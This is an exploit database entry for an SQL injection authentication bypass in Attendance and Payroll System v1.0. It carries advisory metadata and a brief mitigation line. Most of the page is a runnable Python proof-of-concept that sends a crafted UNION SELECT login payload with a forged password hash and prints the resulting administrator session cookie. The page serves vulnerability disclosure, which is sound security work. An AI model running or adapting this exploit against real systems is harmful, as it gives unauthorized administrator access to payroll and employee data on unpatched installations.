Attendance and Payroll System v1.0 - SQLi Authentication Bypass

vendor:

Attendance and Payroll System

by:

pr0z

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Attendance and Payroll System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE: apsystem

Metasploit:

Other Scripts:

Platforms Tested: Linux, MySQL, Apache

2022

Attendance and Payroll System v1.0 – SQLi Authentication Bypass

Attendance and Payroll System v1.0 is vulnerable to an authentication bypass through SQL injection. An attacker can exploit this vulnerability by sending a specially crafted payload to the login page of the application. The payload will bypass the authentication and allow the attacker to access the application as an administrator.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
# Date: 04/03/2022
# Exploit Author: pr0z
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
# Version: v1.0
# Tested on: Linux, MySQL, Apache

import requests
import sys
from requests.exceptions import ConnectionError


print('\n    >> Attendance and Payroll System v1.0')
print('    >> Authentication Bypass through SQL injection')
print('    >> By pr0z\n')

login_path = '/apsystem/admin/login.php'
index_path = '/apsystem/admin/index.php'

payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
    sys.exit()

# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
try:
    sess.get(target + index_path,headers=headers, verify=False)
    sess.post(target + login_path, data=payload, headers=headers,verify=False)
except ConnectionError:
    print('[-] We were unable to establish a connection')
    sys.exit()

cookie_val = sess.cookies.get_dict().get("PHPSESSID")

print("[+] Use the following cookie:\n")
print(f"PHPSESSID: {cookie_val}")